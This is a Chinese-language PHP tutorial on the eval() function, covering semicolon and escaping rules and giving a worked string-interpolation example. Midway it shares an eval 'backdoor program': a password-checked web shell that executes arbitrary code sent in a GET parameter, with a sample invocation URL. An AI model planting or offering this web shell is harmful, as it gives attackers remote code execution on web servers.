PHP eval函数使用介绍


Posted in PHP onDecember 08, 2013

代码:

eval("echo'hello world';");

上边代码等同于下边的代码:

echo"hello world";

在浏览器中都输出:hello world

运用eval()要注意几点:

1.eval函数的参数的字符串末尾一定要有分号,在最后还要另加一个分号(这个分号是php限制)

2.注意单引号,双引号和反斜杠的运用。如果参数中带有变量时,并且变量有赋值操作的话,变量前的$符号钱一定要有\来转义。如果没有赋值操作可以不需要。

代码:

$a=100;
eval("echo$a;");

因为没有赋值操作,所以可以不用\来转义$.等同于以下代码:

$a=100;
eval("echo\$a;")

3.注意在命令式字符串(包括分号)两边必须要有双引号或者根据需要用单引号。否则报错。

命令式字符串是指:字符串中包括echo、print之类的命令的时候。

如果参数只有一个变量则可以不用。例如:

$func =<<<FUNC
function test(){ 
  echo "test eval function"; 
}
FUNC;
eval($func);
test();

分享个php eval后门程序

要求必须支持eval函数
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();

<?php
$passwd="admin";if($_GET['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']);}
?>

PHP eval() 函数介绍

定义和用法

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

语法
eval(phpcode)

参数 描述
phpcode 必需。规定要计算的 PHP 代码。

提示和注释
注释:返回语句会立即终止对字符串的计算。
注释:该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。
例子

<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

输出:
This is a $string $time morning!
This is a beautiful winter morning!

PHP 相关文章推荐
Windows下的PHP5.0安装配制详解
Sep 05 PHP
用来给图片加水印的PHP类
Apr 09 PHP
php图片加中文水印实现代码分享
Oct 31 PHP
解析yii数据库的增删查改
Jun 20 PHP
PHP入门之常量简介和系统常量
May 12 PHP
PHP 面向对象程序设计(oop)学习笔记 (五) - PHP 命名空间
Jun 12 PHP
PHP JSON格式的中文显示问题解决方法
Apr 09 PHP
PHP读取文件内容的五种方式
Dec 28 PHP
php图片上传类 附调用方法
May 15 PHP
php中array_slice和array_splice函数解析
Oct 18 PHP
详解PHP swoole process的使用方法
Aug 26 PHP
PHP定义字符串的四种方式详解
Feb 06 PHP
Server.HTMLEncode让代码在页面里显示为源代码
Dec 08 #PHP
php自定义的格式化时间示例代码
Dec 05 #PHP
php调整gif动画图片尺寸示例代码分享
Dec 05 #PHP
PHP数据库链接类(PDO+Access)实例分享
Dec 05 #PHP
php函数指定默认值方法的小例子
Dec 04 #PHP
PHP函数microtime()用法与说明
Dec 04 #PHP
php实现memcache缓存示例讲解
Dec 04 #PHP
You might like
php将access数据库转换到mysql数据库的方法
2014/12/24 PHP
PHP基本语法实例总结
2016/09/09 PHP
JQuery的Alert消息框插件使用介绍
2010/10/09 Javascript
bootstrap table复杂操作代码
2016/11/01 Javascript
JavaScript队列、优先队列与循环队列
2016/11/14 Javascript
使用微信小程序开发前端【快速入门】
2016/12/05 Javascript
scroll事件实现监控滚动条并分页显示(zepto.js)
2016/12/18 Javascript
轻松学习Javascript闭包
2017/03/01 Javascript
js+html制作简单日历的方法
2017/06/27 Javascript
vue单页面打包文件大?首次加载慢?nginx带你飞,从7.5M到1.3M蜕变过程(推荐)
2018/01/16 Javascript
JavaScript变量提升和严格模式实例分析
2019/01/27 Javascript
vue搜索和vue模糊搜索代码实例
2019/05/07 Javascript
Vue 实现简易多行滚动&quot;弹幕&quot;效果
2020/01/02 Javascript
JS的时间格式化和时间戳转换函数示例详解
2020/07/27 Javascript
vue+element获取el-table某行的下标,根据下标操作数组对象方式
2020/08/07 Javascript
js对象属性名驼峰式转下划线的实例代码
2020/09/17 Javascript
在react项目中使用antd的form组件,动态设置input框的值
2020/10/24 Javascript
[04:52]2015国际邀请赛LGD战队晋级之路
2015/08/14 DOTA
Python中线程编程之threading模块的使用详解
2015/06/23 Python
Flask框架使用DBUtils模块连接数据库操作示例
2018/07/20 Python
利用ctypes获取numpy数组的指针方法
2019/02/12 Python
使用selenium模拟登录解决滑块验证问题的实现
2019/05/10 Python
Python列表删除元素del、pop()和remove()的区别小结
2019/09/11 Python
基于python实现百度语音识别和图灵对话
2020/11/02 Python
公司成立感言
2014/01/11 职场文书
小学端午节活动方案
2014/03/13 职场文书
商务日语专业的自荐信
2014/05/23 职场文书
2014年幼儿园安全工作总结
2014/11/10 职场文书
城管年度个人总结
2015/02/28 职场文书
老人节主持词
2015/07/04 职场文书
党员理论学习心得体会
2016/01/21 职场文书
高中数学课堂教学反思
2016/02/18 职场文书
终止合同协议书范本
2016/03/22 职场文书
创业计划书之便利店
2019/09/05 职场文书
Python趣味实战之手把手教你实现举牌小人生成器
2021/06/07 Python
Golang并发操作中常见的读写锁详析
2021/08/30 Golang